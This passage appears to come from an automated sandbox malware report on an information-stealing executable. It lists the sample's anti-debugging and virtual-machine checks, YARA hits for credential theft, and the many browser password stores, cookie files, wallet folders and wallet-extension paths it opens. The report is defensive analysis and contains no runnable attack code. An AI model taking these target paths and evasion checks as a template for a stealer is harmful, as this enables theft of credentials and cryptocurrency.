                    Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: Vd3tOP5WSD.exe, 00000000.00000003.2714979876.0000000002F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                    Source: Vd3tOP5WSD.exe, 00000000.00000003.2714979876.0000000002F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                    Source: Vd3tOP5WSD.exe, 00000000.00000003.2714979876.0000000002F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                    Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
                    Source: Vd3tOP5WSD.exe, 00000000.00000003.2714979876.0000000002F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                    Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.6.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
                    Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Vd3tOP5WSD.exe, 00000000.00000003.2714979876.0000000002F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                    Source: Vd3tOP5WSD.exe, 00000000.00000003.2714315814.0000000002E48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
                    Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Vd3tOP5WSD.exe, 00000000.00000003.2714979876.0000000002F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                    Source: Vd3tOP5WSD.exe, 00000000.00000003.2714979876.0000000002F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                    Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
                    Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Vd3tOP5WSD.exe, 00000000.00000003.2714979876.0000000002F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                    Source: Vd3tOP5WSD.exe, 00000000.00000003.2714979876.0000000002F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                    Source: Vd3tOP5WSD.exe, 00000000.00000003.2714979876.0000000002F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                    Source: Vd3tOP5WSD.exe, 00000000.00000003.2714979876.0000000002F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                    Source: Vd3tOP5WSD.exe, 00000000.00000003.2714979876.0000000002F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                    Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Vd3tOP5WSD.exe, 00000000.00000003.2714979876.0000000002F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                    Source: Vd3tOP5WSD.exe, 00000000.00000003.2714979876.0000000002F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                    Source: Vd3tOP5WSD.exe, 00000000.00000003.2714979876.0000000002F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                    Source: Vd3tOP5WSD.exe, 00000000.00000003.2714979876.0000000002F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                    Source: Vd3tOP5WSD.exe, 00000000.00000003.2714979876.0000000002F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                    Source: Vd3tOP5WSD.exe, 00000000.00000003.2714979876.0000000002F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeAPI call chain: ExitProcess graph end nodegraph_0-73626

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_004244E4 NtSetInformationThread 000000FE,00000011,00000000,00000000,?,?,?,?,?,0041EC640_2_004244E4
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleepgraph_0-73711
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeSystem information queried: KernelDebuggerInformationJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeProcess queried: DebugObjectHandleJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeProcess queried: DebugFlagsJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00429EF7 rdtsc 0_2_00429EF7
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0044E33B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0044E33B
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0041F9A4 GetCurrentProcessId,NtDuplicateObject,NtClose,GetProcessId,NtQuerySystemInformation,NtQuerySystemInformation,0_2_0041F9A4
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00422177 mov eax, dword ptr fs:[00000030h]0_2_00422177
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00443998 mov ecx, dword ptr fs:[00000030h]0_2_00443998
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0041F9A4 mov eax, dword ptr fs:[00000030h]0_2_0041F9A4
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_004262A1 mov eax, dword ptr fs:[00000030h]0_2_004262A1
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0043B362 mov eax, dword ptr fs:[00000030h]0_2_0043B362
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0044FB15 mov eax, dword ptr fs:[00000030h]0_2_0044FB15
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_004244E4 mov eax, dword ptr fs:[00000030h]0_2_004244E4
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_004224A3 mov eax, dword ptr fs:[00000030h]0_2_004224A3
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_004245EC mov eax, dword ptr fs:[00000030h]0_2_004245EC
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00421EEB mov eax, dword ptr fs:[00000030h]0_2_00421EEB
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00422817 mov eax, dword ptr fs:[00000030h]0_2_00422817
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0041F916 mov eax, dword ptr fs:[00000030h]0_2_0041F916
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_004269E4 mov eax, dword ptr fs:[00000030h]0_2_004269E4
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00424995 mov eax, dword ptr fs:[00000030h]0_2_00424995
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00424995 mov eax, dword ptr fs:[00000030h]0_2_00424995
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00426A42 mov eax, dword ptr fs:[00000030h]0_2_00426A42
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0042F265 mov eax, dword ptr fs:[00000030h]0_2_0042F265
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00424B24 mov eax, dword ptr fs:[00000030h]0_2_00424B24
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0041EBEB mov eax, dword ptr fs:[00000030h]0_2_0041EBEB
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00424BED mov eax, dword ptr fs:[00000030h]0_2_00424BED
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00424C8D mov eax, dword ptr fs:[00000030h]0_2_00424C8D
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0041E6F0 mov eax, dword ptr fs:[00000030h]0_2_0041E6F0
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00429EF7 mov eax, dword ptr fs:[00000030h]0_2_00429EF7
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009B4853 mov eax, dword ptr fs:[00000030h]0_2_009B4853
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0099092B mov eax, dword ptr fs:[00000030h]0_2_0099092B
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009BA15E mov eax, dword ptr fs:[00000030h]0_2_009BA15E
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009B2152 mov eax, dword ptr fs:[00000030h]0_2_009B2152
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009AE957 mov eax, dword ptr fs:[00000030h]0_2_009AE957
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009B2A7E mov eax, dword ptr fs:[00000030h]0_2_009B2A7E
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009B23DE mov eax, dword ptr fs:[00000030h]0_2_009B23DE
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009D3BFF mov ecx, dword ptr fs:[00000030h]0_2_009D3BFF
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009B4BFC mov eax, dword ptr fs:[00000030h]0_2_009B4BFC
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009B4BFC mov eax, dword ptr fs:[00000030h]0_2_009B4BFC
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009AFB7D mov eax, dword ptr fs:[00000030h]0_2_009AFB7D
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009B6CA9 mov eax, dword ptr fs:[00000030h]0_2_009B6CA9
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009BF4CC mov eax, dword ptr fs:[00000030h]0_2_009BF4CC
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009AFC0B mov eax, dword ptr fs:[00000030h]0_2_009AFC0B
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009B6C4B mov eax, dword ptr fs:[00000030h]0_2_009B6C4B
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00990D90 mov eax, dword ptr fs:[00000030h]0_2_00990D90
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009B4D8B mov eax, dword ptr fs:[00000030h]0_2_009B4D8B
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009CB5C9 mov eax, dword ptr fs:[00000030h]0_2_009CB5C9
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009B6508 mov eax, dword ptr fs:[00000030h]0_2_009B6508
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009DFD7C mov eax, dword ptr fs:[00000030h]0_2_009DFD7C
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009B4EF4 mov eax, dword ptr fs:[00000030h]0_2_009B4EF4
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009AEE52 mov eax, dword ptr fs:[00000030h]0_2_009AEE52
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009B4E54 mov eax, dword ptr fs:[00000030h]0_2_009B4E54
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009B270A mov eax, dword ptr fs:[00000030h]0_2_009B270A
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009B474B mov eax, dword ptr fs:[00000030h]0_2_009B474B
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00A38FFB push dword ptr fs:[00000030h]0_2_00A38FFB
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0043323B GetProcessHeap,CreateDCW,GetSystemMetrics,GetSystemMetrics,DeleteDC,0_2_0043323B
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0044E33B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0044E33B
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0043D3A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0043D3A0
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0043CE89 SetUnhandledExceptionFilter,0_2_0043CE89
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0043CE95 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0043CE95
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009CD0FC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009CD0FC
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009CD0F0 SetUnhandledExceptionFilter,0_2_009CD0F0
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009DE5A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009DE5A2
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009CD607 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_009CD607
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0043D0B8 cpuid 0_2_0043D0B8
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0044614F GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_0044614F
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00402476 GetComputerNameW,GetUserNameW,0_2_00402476
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00453BC4 GetTimeZoneInformation,0_2_00453BC4
                    Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                    Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0.2.Vd3tOP5WSD.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Vd3tOP5WSD.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.Vd3tOP5WSD.exe.23c0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.Vd3tOP5WSD.exe.23c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2148951176.00000000023C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Vd3tOP5WSD.exe PID: 2052, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Vd3tOP5WSD.exeString found in binary or memory: %appdata%\Electrum\wallets
                    Source: Vd3tOP5WSD.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                    Source: Vd3tOP5WSD.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
                    Source: Vd3tOP5WSD.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3922174302.00000000030CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Binance6
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3922174302.00000000030CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\EthereumB
                    Source: Vd3tOP5WSD.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3921069838.0000000002E7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3922174302.00000000030CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ledger Live
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\key4.dbJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcoblJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENTJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflalJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhlJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmlJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfelJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
